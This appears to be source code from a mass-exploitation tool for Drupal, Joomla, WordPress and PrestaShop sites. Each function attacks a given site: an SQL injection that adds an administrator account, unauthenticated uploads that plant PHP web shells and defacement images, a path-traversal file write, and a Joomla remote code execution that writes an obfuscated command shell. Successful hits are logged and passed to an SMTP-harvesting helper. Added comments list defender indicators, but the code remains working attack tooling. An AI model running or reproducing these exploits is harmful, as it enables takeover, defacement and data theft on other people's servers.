def Exploit(site): user = '******' password = '******' Hash = '$S$CTo9G7Lx2FC8odOl10OKshDIRREshaeCN8.zqA9I3PT0X4cqLUJ3mBEdyl6juLsRE3EBTKNzhGXKiz5rMulPcvmBhxbLNn1'[:55] POSTDATA = { 'name[0%20;insert+into+users+(status,+uid,+name,+pass)+SELECT+1,' '+MAX(uid)%2B1,+%27{}%27,+%27{}%27+FROM+users;insert+into+users_' 'roles+(uid,+rid)+VALUES+((SELECT+uid+FROM+users+WHERE+name+%3d+' '%27{}%27),+3);;#%20%20]'.format(user, Hash, user): 'test3&name[0]', 'name[0]': 'test', 'pass': '******', 'test2': 'test', 'form_build_id': '', 'form_id': 'user_login_block', 'op': 'Log+in' } agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} try: resp = requests.post('http://' + site + '/?q=node&destination=node', timeout=10, data=POSTDATA, headers=agent) if "mb_strlen() expects parameter 1" in str(resp.content): with open('result/AdminTakeover_results.txt', 'a') as writer: writer.write(site + '/user/login\n Username: {}\n' ' Password: {}\n------------------------------------------\n' .format(user, password)) return printModule.returnYes(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal') else: return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal') except: return printModule.returnNo(site, 'CVE-2014-3704', 'Drupal7 Add Admin', 'Drupal')
# Upload test against the Joomla mod_simplefileuploadv1.3 module: POSTs files/up.php as 'file' to
# elements/udd.php, then checks elements/up.php for the 'Vuln!!' marker and logs a hit to
# result/Shell_results.txt.
# Defender notes: unauthenticated POSTs to mod_simplefileuploadv1.3/elements/udd.php and a new
# up.php beside it are the indicators; remove the module and deny script execution wherever
# uploads are stored.
# NOTE(review): the file handle is never closed; bare `except:` maps every error to a negative result.
def Exploit(site): try: PostFile = {'file': open('files/up.php', 'rb')} requests.post('http://' + site + '/modules/mod_simplefileuploadv1.3/elements/udd.php', files=PostFile, timeout=10, headers=Headers) CheckShell = requests.get( 'http://' + site + '/modules/mod_simplefileuploadv1.3/elements/up.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( site + '/modules/mod_simplefileuploadv1.3/elements/up.php' + '\n') return printModule.returnYes(site, 'N/A', 'mod_simplefileuploadv Module', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'mod_simplefileuploadv Module', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'mod_simplefileuploadv Module', 'Joomla')
# Upload test against the PrestaShop attributewizardpro_x module's file_upload.php: POSTs an image
# as 'userfile', takes the stored name from the text before '|||' in the response, and checks
# file_uploads/<name> for a 'GIF89a' header; it then repeats with the file named by ShellPresta and
# checks for the 'Vuln!!' marker. Hits are appended to the result/*.txt files.
# Defender notes: POSTs to attributewizardpro_x/file_upload.php and new files under its
# file_uploads/ directory are the indicators; update or remove the module and deny script
# execution in that directory.
# NOTE(review): file handles are never closed; bare `except:` maps every error to a negative result.
def Exploit(site): try: Exp = site + '/modules/attributewizardpro_x/file_upload.php' FileDataIndex = {'userfile': open(Jce_Deface_image, 'rb')} FileDataShell = {'userfile': open(ShellPresta, 'rb')} GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers) if Jce_Deface_image.split('/')[1] in GoT.content: Index = GoT.content.split('|||')[0] IndexPath = site + '/modules/attributewizardpro_x/file_uploads/' + Index CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers) if 'GIF89a' in CheckIndex.content: with open('result/Index_results.txt', 'a') as writer: writer.write(IndexPath + '\n') Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5, headers=Headers) if ShellPresta.split('/')[1] in GoT.content: Shell = Got2.content.split('|||')[0] ShellPath = site + '/modules/attributewizardpro_x/file_uploads/' + Shell CheckShell = requests.get('http://' + ShellPath, timeout=5, headers=Headers) if 'Vuln!!' in CheckShell.content: with open('result/Shell_results.txt', 'a') as writer: writer.write(ShellPath + '\n') return printModule.returnYes(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop') except: return printModule.returnNo(site, 'N/A', 'attributewizardpro_x Module', 'Prestashop')
# Upload test against the Joomla com_jdownloads public upload view: submits the upload form at
# index.php?option=com_jdownloads&Itemid=0&view=upload with an archive (ZipJd) as 'file_upload' and
# an image as 'pic_upload'. If the reply references '/upload_ok.png' it fetches
# /images/jdownloads/screenshots/<image name> and logs the URL when it starts serving 'GIF89a'.
# Defender notes: anonymous submissions to view=upload and new files under
# /images/jdownloads/screenshots/ are the indicators; disable anonymous uploads or update the component.
# NOTE(review): the dict literal defines 'description' twice, so only the later value is sent;
# the 'mail' value is a redaction artifact. File handles are never closed and bare `except:`
# maps every error to a negative result.
def Com_Jdownloads(site): try: fileindex = {'file_upload': (ZipJd, open(ZipJd, 'rb'), 'multipart/form-data'), 'pic_upload': (Jce_Deface_image, open(Jce_Deface_image, 'rb'), 'multipart/form-data')} post_data = { 'name': 'ur name', 'mail': '*****@*****.**', 'catlist': '1', 'filetitle': "lolz", 'description': "<p>zot</p>", '2d1a8f3bd0b5cf542e9312d74fc9766f': 1, 'send': 1, 'senden': "Send file", 'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>", 'option': "com_jdownloads", 'view': "upload" } Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload' Got = requests.post(Exp, files=fileindex, data=post_data, timeout=10, headers=Headers) if '/upload_ok.png' in str(Got.content): checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + Jce_Deface_image.split('/')[1] Check = requests.get(checkUrl, timeout=10, headers=Headers) if 'GIF89a' in str(Check.content): with open('result/Index_results.txt', 'a') as writer: writer.write(checkUrl + '\n') return printModule.returnYes(site, 'N/A', 'Com_Jdownloads', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla')
# Upload test against the PrestaShop fieldvmegamenu module's ajax/upload.php: if the endpoint
# answers 200 it POSTs an image as 'images[]' and checks uploads/<name> for 'GIF89a', then POSTs
# the file named by ShellPresta and checks uploads/<name> for the 'Vuln!!' marker. Hits are
# appended to the result/*.txt files.
# Defender notes: POSTs to fieldvmegamenu/ajax/upload.php and non-image files under the module's
# uploads/ directory are the indicators; update or remove the module and deny script execution there.
# NOTE(review): file handles are never closed; bare `except:` maps every error to a negative result.
def Exploit(site): Exl = site + '/modules/fieldvmegamenu/ajax/upload.php' try: Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers) if Checkvuln.status_code == 200: FileDataIndex = {'images[]': open(Jce_Deface_image, 'rb')} FileDataShell = {'images[]': open(ShellPresta, 'rb')} uploadedPathIndex = site + '/modules/fieldvmegamenu/uploads/' + Jce_Deface_image.split('/')[1] uploadedPathShell = site + '/modules/fieldvmegamenu/uploads/' + ShellPresta.split('/')[1] requests.post('http://' + Exl, files=FileDataIndex, timeout=5, headers=Headers) CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers) if 'GIF89a' in CheckIndex.content: with open('result/Index_results.txt', 'a') as writer: writer.write(uploadedPathIndex + '\n') requests.post('http://' + Exl, files=FileDataShell, timeout=5, headers=Headers) Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers) if 'Vuln!!' in Checkshell.content: with open('result/Shell_results.txt', 'a') as writer: writer.write(uploadedPathShell + '\n') return printModule.returnYes(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop') except: return printModule.returnNo(site, 'N/A', 'fieldvmegamenu Module', 'Prestashop')
# Upload test against the PrestaShop wg24themeadministration module's wg24_ajax.php: if the
# endpoint answers 200 it POSTs with type='pattern_upload' an image and then the file named by
# ShellPresta, checking img/upload/<name> for 'GIF89a' and for the 'Vuln!!' marker respectively.
# Hits are appended to the result/*.txt files.
# Defender notes: POSTs to wg24_ajax.php with type=pattern_upload and non-image files under the
# module's img/upload/ directory are the indicators; update or remove the module and deny script
# execution in that directory.
# NOTE(review): file handles are never closed; bare `except:` maps every error to a negative result.
def Exploit(site): Exl = site + '/modules/wg24themeadministration/wg24_ajax.php' try: Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers) if Checkvuln.status_code == 200: PostData = {'data': 'bajatax', 'type': 'pattern_upload'} FileDataIndex = {'bajatax': open(Jce_Deface_image, 'rb')} FileDataShell = {'bajatax': open(ShellPresta, 'rb')} uploadedPathIndex = site + '/modules/wg24themeadministration/img/upload/' \ + Jce_Deface_image.split('/')[1] uploadedPathShell = site + '/modules/wg24themeadministration/img/upload/' \ + ShellPresta.split('/')[1] requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5, headers=Headers) CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers) if 'GIF89a' in CheckIndex.content: with open('result/Index_results.txt', 'a') as writer: writer.write(uploadedPathIndex + '\n') requests.post('http://' + Exl, files=FileDataShell, data=PostData, timeout=5, headers=Headers) Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers) if 'Vuln!!' in Checkshell.content: with open('result/Shell_results.txt', 'a') as writer: writer.write(uploadedPathShell + '\n') return printModule.returnYes(site, 'N/A', 'wg24themeadministration Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop') except: return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
# Test for the Revslider issue this code labels CVE-2015-5151: POSTs to admin-ajax.php with
# action=revslider_ajax_action and client_action=update_captions_css, placing HTML in the 'data'
# field, then reads the stored content back through client_action=get_captions_css. A reply
# containing 'succesfully' followed by a read-back containing 'Vuln!!' is logged to
# result/Index_results.txt.
# Defender notes: unauthenticated admin-ajax.php requests with client_action=update_captions_css
# are the indicator; update the plugin and review the stored captions CSS for injected markup.
# NOTE(review): the posted text is 'Acik bulundu!' while the read-back check looks for 'Vuln!!',
# so the verdict may not reflect the write - confirm. Bare `except:` hides all errors.
def Exploit(site): IndeXText = 'Acik bulundu!' ency = { 'action': "revslider_ajax_action", 'client_action': "update_captions_css", 'data': "<body style='color: transparent;background-color: black'><center><h1>" "<b style='color: white'>" + IndeXText + "<p style='color: transparent'>", } try: url = "http://" + site + \ "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" aa = requests.post(url, data=ency, timeout=10, headers=Headers) if 'succesfully' in str(aa.content): deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css' X = requests.get('http://' + deface, timeout=10, headers=Headers) if 'Vuln!!' in str(X.content): with open('result/Index_results.txt', 'a') as writer: writer.write(deface + '\n') return printModule.returnYes(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress') except: return printModule.returnNo(site, 'CVE-2015-5151', 'Revslider CSS Injection', 'Wordpress')
# File-write test against the Joomla com_oziogallery writeToFile.php script: POSTs `payloadshell`
# as 'raw_data' (filename vuln.php) with path='../../../tmp/', then checks /tmp/up.php for the
# 'Vuln!!' marker. On a hit it logs /tmp/vuln.php to result/Shell_results.txt and calls
# getSMTP.JooomlaSMTPshell on it (defined elsewhere).
# Defender notes: POSTs to imagin/scripts_ralcr/filesystem/writeToFile.php with a path value
# containing '../' and new .php files under /tmp are the indicators; remove or update the
# component and deny script execution in /tmp.
# NOTE(review): the check fetches /tmp/up.php but the logged path is /tmp/vuln.php - the two
# names disagree. Bare `except:` maps every error to a negative result.
def Exploit(site): try: PostData = {'path': '../../../tmp/'} fil = {'raw_data': ('vuln.php', payloadshell, 'text/html')} requests.post( 'http://' + site + '/components/com_oziogallery/imagin/scripts_ralcr/filesystem' '/writeToFile.php', files=fil, data=PostData, headers=Headers, timeout=10) CheckShell = requests.get('http://' + site + '/tmp/up.php', headers=Headers, timeout=10) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/tmp/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php?cmd=id') return printModule.returnYes(site, 'N/A', 'Com_oziogallery', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla')
# Upload test against the OpenFlashChart helper bundled with the Joomla com_civicrm component:
# POSTs `payloadshell` as the raw body to php-ofc-library/ofc_upload_image.php?name=vuln.php, then
# checks tmp-upload-images/vuln.php for the 'Vuln!!' marker. On a hit it logs the URL to
# result/Shell_results.txt and calls getSMTP.JooomlaSMTPshell on it (defined elsewhere).
# Defender notes: any request to ofc_upload_image.php, and .php files under tmp-upload-images/,
# are the indicators; delete the bundled upload script or update the component, and deny script
# execution in that directory.
# NOTE(review): bare `except:` maps every error to a negative result.
def Exploit(site): try: requests.post( 'http://' + site + '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/' 'php-ofc-library/ofc_upload_image.php?name=vuln.php', data=payloadshell, headers=Headers, timeout=10) Exp = requests.get( 'http://' + site + '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/' 'tmp-upload-images/vuln.php', headers=Headers, timeout=10) if 'Vuln!!' in str(Exp.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( site + '/administrator/components/com_civicrm/civicrm/packages/' 'OpenFlashChart/tmp-upload-images/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell( site + '/administrator/components/com_civicrm/civicrm/packages/' 'OpenFlashChart/tmp-upload-images/vuln.php?cmd=id') return printModule.returnYes(site, 'N/A', 'Com_civicrm', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla')
# Test for the Joomla issue this code labels CVE-2015-8562: sends the payload built by
# get_backdoor_pay() to /index.php/component/users via make_req, confirms it with ping_backdoor,
# and then uses execute_backdoor to write vuln.htm and vuln.php into the working directory (all
# four helpers and `backdoor_param` are defined elsewhere). It then fetches both files, logs those
# serving the 'Vuln!!' marker to the result/*.txt files, and calls getSMTP.JooomlaSMTPshell.
# Defender notes: how the payload is delivered is not visible here; the visible indicators are
# requests to /index.php/component/users followed by fetches of /vuln.php and /vuln.htm, and those
# two files appearing in the web root. Treat a hit as code execution on the host and update Joomla.
# NOTE(review): in this collapsed form the inline '# cmd=commend' comment swallows the rest of the
# line; bare `except:` maps every error to a negative result.
def exploit(url): try: target_url = url + '/index.php/component/users' make_req(target_url, get_backdoor_pay()) if ping_backdoor(url, backdoor_param): execute_backdoor( url, 'system(\'echo "Vuln!!" > vuln.htm\');') # cmd=commend execute_backdoor( url, 'system(\'echo "Vuln!!<?php {}(base64_decode("{}")); ?>" > vuln.php\');' .format('eval', 'c3lzdGVtKCRfR0VUWyJjbWQiXSk7')) CheckShell = requests.get('http://' + url + '/vuln.php', headers=Headers, timeout=10) checkIndex = requests.get('http://' + url + '/vuln.htm', headers=Headers, timeout=10) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(url + '/vuln.php?cmd=id' + '\n') getSMTP.JooomlaSMTPshell(url + '/vuln.php?cmd=id') if 'Vuln!!' in str(checkIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(url + '/vuln.htm\n') return printModule.returnYes(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla') else: return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla') except: return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla')
def Exploit(site):
    """Check a Prestashop host for an open upload endpoint in the advancedslider module.

    Requests ``ajax_advancedsliderUpload.php``; if it answers HTTP 200, posts
    the file at the module-level path ``Jce_Deface_image`` as form field
    ``qqfile``, then fetches it from the module's ``uploads/`` directory and
    looks for the GIF magic ``GIF89a`` in the response body.

    Args:
        site: Host (and optional path) without scheme.

    Returns:
        Whatever ``printModule.returnYes`` / ``printModule.returnNo`` return.

    Defender notes:
        * Log pattern: GET then multipart POST to
          ``/modules/advancedslider/ajax_advancedsliderUpload.php`` followed by
          a GET under ``/modules/advancedslider/uploads/``.
        * On-disk indicator: unexpected files in that ``uploads/`` directory.
        * Mitigation: remove or update the module, require authentication on
          the upload endpoint, and deny script execution in ``uploads/``.
    """
    # NOTE(review): the listing arrived collapsed onto one line; the nesting
    # below is the most plausible reading -- confirm against the upstream file.
    try:
        Exp = site + '/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php'
        # Reachability probe: only the status code is inspected.
        Checkvuln = requests.get('http://' + Exp, timeout=10, headers=Headers)
        FileDataIndex = {'qqfile': open(Jce_Deface_image, 'rb')}
        if Checkvuln.status_code == 200:
            requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers)
            # The stored name is taken from the second '/'-separated component
            # of the local path.
            IndexPath = site + '/modules/advancedslider/uploads/' + Jce_Deface_image.split(
                '/')[1]
            CheckIndex = requests.get('http://' + IndexPath, timeout=10, headers=Headers)
            # 'GIF89a' is the GIF header; its presence means the file is served.
            if 'GIF89a' in str(CheckIndex.content):
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(IndexPath + '\n')
                return printModule.returnYes(site, 'N/A', 'advancedslider Module', 'Prestashop')
            else:
                return printModule.returnNo(site, 'N/A', 'advancedslider Module', 'Prestashop')
        else:
            return printModule.returnNo(site, 'N/A', 'advancedslider Module', 'Prestashop')
    except:
        # Bare except: every failure is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'advancedslider Module', 'Prestashop')
def Exploit(site):
    """Check a Prestashop host for an open upload endpoint in cartabandonmentproOld.

    Requests the module's ``upload.php``; if it answers HTTP 200, posts the
    file at the module-level path ``Jce_Deface_image`` as form field
    ``image``, then fetches it from the module's ``uploads/`` directory and
    looks for the GIF magic ``GIF89a`` in the response body.

    Args:
        site: Host (and optional path) without scheme.

    Returns:
        Whatever ``printModule.returnYes`` / ``printModule.returnNo`` return.

    Defender notes:
        * Log pattern: GET then multipart POST to
          ``/modules/cartabandonmentproOld/upload.php`` followed by a GET
          under ``/modules/cartabandonmentproOld/uploads/``.
        * On-disk indicator: unexpected files in that ``uploads/`` directory.
        * Mitigation: remove or update the module, require authentication on
          the upload endpoint, and deny script execution in ``uploads/``.
    """
    # NOTE(review): the listing arrived collapsed onto one line; the nesting
    # below is the most plausible reading -- confirm against the upstream file.
    try:
        Exp = site + '/modules/cartabandonmentproOld/upload.php'
        # Reachability probe: only the status code is inspected.
        Checkvuln = requests.get('http://' + Exp, timeout=5, headers=Headers)
        FileDataIndex = {'image': open(Jce_Deface_image, 'rb')}
        if Checkvuln.status_code == 200:
            requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers)
            # The stored name is taken from the second '/'-separated component
            # of the local path.
            IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + Jce_Deface_image.split(
                '/')[1]
            CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers)
            # 'GIF89a' is the GIF header; its presence means the file is served.
            if 'GIF89a' in str(CheckIndex.content):
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(IndexPath + '\n')
                return printModule.returnYes(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop')
            else:
                return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop')
        else:
            return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop')
    except:
        # Bare except: every failure is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop')
def Exploit(site):
    """Check a Prestashop host for an open upload endpoint in the columnadverts module.

    Posts ``files/pwn.gif`` as form field ``userfile`` to
    ``uploadimage.php``. If the response contains ``success`` and the image is
    then served from ``slides/`` (GIF magic ``GIF89a``), posts
    ``files/up.php`` the same way and checks ``slides/up.php`` for the marker
    ``Vuln!!``. Hits are appended to the result files.

    Args:
        site: Host (and optional path) without scheme.

    Returns:
        Whatever ``printModule.returnYes`` / ``printModule.returnNo`` return.

    Defender notes:
        * Log pattern: multipart POSTs to
          ``/modules/columnadverts/uploadimage.php`` followed by GETs under
          ``/modules/columnadverts/slides/``.
        * On-disk indicators: ``pwn.gif`` or any ``.php`` file in ``slides/``.
        * Mitigation: remove or update the module, enforce authentication and
          a server-side extension/content allow-list on the endpoint, and
          deny script execution in ``slides/``.
    """
    # NOTE(review): the listing arrived collapsed onto one line; the nesting
    # below is the most plausible reading -- confirm against the upstream file.
    try:
        Exp = site + '/modules/columnadverts/uploadimage.php'
        # Both local files are opened up front, before any request is made.
        FileDataIndex = {'userfile': open('files/pwn.gif', 'rb')}
        FileDataShell = {'userfile': open('files/up.php', 'rb')}
        # Stage 1: image upload.
        GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers)
        if 'success' in GoT.content:
            IndexPath = '/modules/columnadverts/slides/pwn.gif'
            CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers)
            if 'GIF89a' in str(CheckIndex.content):
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(IndexPath + '\n')
                # Stage 2: script upload through the same endpoint, then a
                # read-back for the marker.
                requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers)
                ShellPath = '/modules/columnadverts/slides/up.php'
                CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers)
                if 'Vuln!!' in str(CheckShell.content):
                    with open('result/Shell_results.txt', 'a') as writer:
                        writer.write(site + ShellPath + '\n')
                # Reported as a hit once the image was served, whether or not
                # the script read-back found the marker.
                return printModule.returnYes(site, 'N/A', 'Columnadverts Module', 'Prestashop')
            else:
                return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop')
        else:
            return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop')
    except:
        # Bare except: every failure is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop')
def Exploit(site):
    """Check a WordPress host for the wysija-newsletters theme upload flaw (CVE-2014-4725).

    Posts the archive at the module-level path ``MailPoetZipShell`` as form
    field ``my-theme`` to ``admin-post.php?page=wysija_campaigns&action=themes``.
    If the response contains the ``reload=1`` redirect string, fetches
    ``vuln.php`` and ``pwn.gif`` from ``wp-content/uploads/wysija/themes/rock/``
    and appends hits to the result files.

    Args:
        site: Host (and optional path) without scheme.

    Returns:
        Whatever ``printModule.returnYes`` / ``printModule.returnNo`` return.

    Defender notes:
        * Log pattern: a multipart POST to ``/wp-admin/admin-post.php`` with
          ``page=wysija_campaigns&action=themes`` sent without any session
          cookie or credentials, followed by GETs under
          ``/wp-content/uploads/wysija/themes/``.
        * On-disk indicator: ``.php`` files anywhere under
          ``wp-content/uploads/wysija/themes/``.
        * Mitigation: update the plugin to a release that fixes
          CVE-2014-4725 and deny script execution under ``wp-content/uploads``.
    """
    # NOTE(review): the listing arrived collapsed onto one line; the nesting
    # below is the most plausible reading -- confirm against the upstream file.
    try:
        FileShell = {'my-theme': open(MailPoetZipShell, 'rb')}
        PostData = {'action': "themeupload", 'submitter': "Upload",
                    'overwriteexistingtheme': "on", 'page': 'GZNeFLoZAb'}
        # The upload uses this fixed User-Agent instead of the shared
        # `Headers`; the string is usable as a log-matching signature.
        UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
        url = "http://" + site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
        GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10)
        # The reload link in the response is treated as "upload accepted".
        if 'page=wysija_campaigns&action=themes&reload=1' in str(GoT.content):
            sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php'
            index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif'
            CheckShell = requests.get(sh, timeout=10, headers=Headers)
            CheckIndex = requests.get(index, timeout=10, headers=Headers)
            if 'Vuln!!' in str(CheckShell.content):
                with open('result/Shell_results.txt', 'a') as writer:
                    writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + '\n')
                if 'GIF89a' in str(CheckIndex.content):
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n')
                return printModule.returnYes(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
            else:
                return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
        else:
            return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
    except:
        # Bare except: every failure is reported as "not vulnerable".
        return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')